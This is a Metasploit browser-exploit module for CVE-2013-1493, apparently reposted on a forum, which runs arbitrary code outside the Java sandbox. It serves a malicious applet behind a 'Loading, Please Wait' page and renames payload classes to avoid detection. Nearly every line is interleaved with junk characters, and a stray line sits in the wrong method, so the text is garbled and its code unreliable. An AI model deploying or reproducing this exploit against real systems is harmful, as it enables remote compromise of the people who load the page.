##
: S, e/ a0 \8 K+ b' d) N2 }
/ Z" K: C+ g0 A: v) `# This file is part of the Metasploit Framework and may be subject to) Q) _9 n; K y1 c/ ?: O/ q8 b
# redistribution and commercial restrictions. Please see the Metasploit
, C: ^# H3 j, f' X* U8 C2 \! s# web site for more information on licensing and terms of use.
; q+ [# F3 h! W) ^& g) E+ }5 V9 d I# http://metasploit.com/3 n# J$ M$ B' ?4 H4 J0 z
##3 B0 m v; q9 ]# L8 ]1 k
require ‘msf/core’2 o6 Q' N; D8 |
require ‘rex’
3 _7 F I1 d* a) [, t" ^class Metasploit3 < Msf::Exploit::Remote, K9 l( y# o# B8 c6 `
Rank = NormalRanking
P- B( T# E7 q& X# ]& xinclude Msf::Exploit::Remote::HttpServer::HTML
' y9 P2 | p e# ~6 Einclude Msf::Exploit::EXE
) v8 l' r" M `* Einclude Msf::Exploit::Remote::BrowserAutopwn
e9 f+ T& v+ _- \' J& yautopwn_info({ :javascript => false })0 r4 ^7 r3 a' z' _. o. n: K/ x
def initialize( info = {} )
: l1 t$ X; [: L0 v# F) csuper( update_info( info,( p, X( J4 X3 ~4 J4 d1 A3 E' ?5 c% |
‘Name’ => ‘Java CMM Remote Code Execution’,& i8 Y* [, Y1 v3 P. E {
‘Description’ => %q{6 J: s: u% q* m S# p
This module abuses the Color Management classes from a Java Applet to run
8 }( r( S& y) V" I4 w6 L- Sarbitrary Java code outside of the sandbox as exploited in the wild in February
; g; i0 k' e& v; i1 q# ~4 @+ Xand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
+ ~8 f7 w: S* j0 }' @ r8 Z9 eand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
$ j0 S1 k. ^# m; R1 Isystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
! t/ q2 \# n9 @/ d! ?! hwarning in order to run the malicious applet.9 t) J7 r/ H2 S% V! g! {2 H- u, u! G
},9 _$ y, X) q4 [8 ^ \ n
‘License’ => MSF_LICENSE,/ E7 l( E" V: `) H3 u4 D
‘Author’ =>
2 \. f% q4 U. F. B. L2 R6 ^'Unknown', # Vulnerability discovery and Exploit
5 ` `' ]$ W' n, S'juan vazquez' # Metasploit module (just ported the published exploit)
- T5 q9 w# @8 y6 _" t],* V' R; ^' X; e- I! P; ?
‘References’ =>
3 w3 ]5 T1 G' M' f+ f[
: [& l' t& a5 X[ 'CVE', '2013-1493' ]," O, o; t" S& i/ R
[ 'OSVDB', '90737' ],# ~7 v1 u! |7 \% X& R+ x$ \% R
[ 'BID', '58238' ],
$ C }+ T1 B/ @& Q# t[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],/ j1 S. C6 O8 k' |3 f1 j) e
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
% E: K- N9 t- q[ 'URL', 'http://pastie.org/pastes/6581034' ]
: k# g0 Y q4 d5 }! Q% @],* E3 H, N, }% Z8 T& ?6 ^+ X8 L# I
‘Platform’ => [ 'win', 'java' ],* _7 C( S& G) i
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
4 R' t( B( `( F$ J$ D) N‘Targets’ =>
$ U; i+ U: n/ G2 @[; N$ v3 }8 y5 d6 S- |* L9 r1 `+ t9 V
[ 'Generic (Java Payload)',
4 Z6 t+ b1 n$ t% v{
* I" g5 P6 G0 i. c8 b'Platform' => 'java',
) \. ~1 H/ n* @$ \7 M- s! @/ `# W6 @'Arch' => ARCH_JAVA
8 k! ~7 p) A# j: E}
+ @5 w$ h" @4 O4 ?6 l$ Y. S],/ Q- `: Q! d0 ?6 ^
[ 'Windows x86 (Native Payload)',) Y0 f+ U+ s+ W1 _2 M
{% }# h4 ]: Z' e/ M3 i6 z
'Platform' => 'win',
" h: i& z: B6 g' q'Arch' => ARCH_X86
& R6 ~0 g- O- l5 i3 t# |}0 b! w/ r9 |' R6 G
]
" C: F5 |4 @& f( \& w],! \1 c5 F7 n& B/ \# Q0 E0 M/ ?
‘‘DisclosureDate’ => ‘Mar 01 2013′
% n+ k! D" |+ P8 L5 y6 E7 {))6 k" ]5 l2 K! ]4 t# M. u
end
' w0 W+ O# ]; K ^- B u$ V3 ydef setup
0 n! N5 u3 G. b0 @# k, spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)$ F7 O( L: F% Z& ~5 L8 S7 }/ w9 `
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 c' n+ S- y% Q9 ~7 d3 Wpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
, _/ J' g+ d% p) L@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 f/ B) Q. I& u8 X% w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
. ? M7 E! w7 X* W( l7 J@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 p, X! ^" u+ ?0 L
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
4 w$ g% S6 a5 \) w: \# v/ A@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }$ b3 H4 [9 ^5 [, c8 S
@init_class_name = rand_text_alpha(“Init”.length)3 X2 M& g2 e) A
@init_class.gsub!(“Init”, @init_class_name)
/ f6 o% A9 u5 k* asuper0 ^( @ Y- d; \! A% ~* J% A
end
1 o; B0 y7 n7 h* t: n3 v v% vdef on_request_uri(cli, request)8 T& }3 @. a1 K' V4 x0 M$ F2 X5 l0 v
print_status(“handling request for #{request.uri}”)& }$ g2 L$ B2 M K3 Z* m
case request.uri1 z' P2 T7 p' E7 p6 f
when /\.jar$/i: s2 \9 @% ]5 Q) P) K e
jar = payload.encoded_jar
" H3 |$ u, e+ j4 k* U5 F$ ?! z+ Ijar.add_file(“#{@init_class_name}.class”, @init_class)
' m0 c1 _# J& D- k' ?, ajar.add_file(“Leak.class”, @leak_class)
: `6 o+ T1 f; \jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
8 F3 V9 |9 N9 |4 U: s; b0 wjar.add_file(“MyColorSpace.class”, @color_space_class)
9 M K3 ?& {/ D; s$ @! T9 i. DDefaultTarget’ => 1,1 p& ^ k; n/ g; x% J- Q
metasploit_str = rand_text_alpha(“metasploit”.length)( p3 b7 F6 R4 t6 {6 I' f) j
payload_str = rand_text_alpha(“payload”.length)
R; h! I: ]: [; {1 J/ Y9 ajar.entries.each { |entry|
1 t, D$ _0 {, R5 n% u- ]7 lentry.name.gsub!(“metasploit”, metasploit_str)
+ e0 l0 x' l. {: M. r) ventry.name.gsub!(“Payload”, payload_str)
4 P% C0 e M8 d Ientry.data = entry.data.gsub(“metasploit”, metasploit_str)
% X; z3 \/ O% m# \& Lentry.data = entry.data.gsub(“Payload”, payload_str)
, d$ i' p. `$ ?( B9 l4 d}# E7 L! f4 N# M" j0 H1 o- M! I
jar.build_manifest
& d# g# Q) e6 V' C7 i7 {' Csend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
2 G7 h" N# B! iwhen /\/$/. h n- {6 Z3 n% R/ p) E
payload = regenerate_payload(cli)
, `9 C5 t; K% p) jif not payload
; R$ S6 S# N) H4 ?print_error(“Failed to generate the payload.”)' @+ @ L* |+ B- f
send_not_found(cli)
& X. S, ^3 F6 Treturn
& ? N* w0 y; K! t' @& E7 Q" n( aend
7 ~* w/ c" r' `1 x4 W( c2 dsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })1 c4 a: y& b* K+ l, _$ @6 v% Y
else0 q( w0 ~1 m$ F' c
send_redirect(cli, get_resource() + ‘/’, ”)
2 B! X/ B' H* S' Z0 h0 Xend* A0 E3 n u' ~' m
end- @+ E2 V& r) `% M0 g, {! ?
def generate_html+ y9 u$ \9 S8 z, @! S0 l
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|9 S9 E) z6 i$ ~) g! m
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
/ I. C! w% M/ U3 ?/ f( ahtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|' f/ m# i5 K+ G4 b, S; l' f% ~
html += %Q|</applet></body></html>|& f% H( T# Q- `& r: O3 F+ w
return html
# d, R1 R, I+ h$ l; j5 b! jend
& M3 w( D, T8 V( O9 X1 r* V- Gend9 n) H5 e0 s5 ]: ~4 ]: ~6 i
end3 a2 _0 x- z) }; _' q9 L7 V
|
发表于 2013-4-4 17:31:17
收藏
支持
反对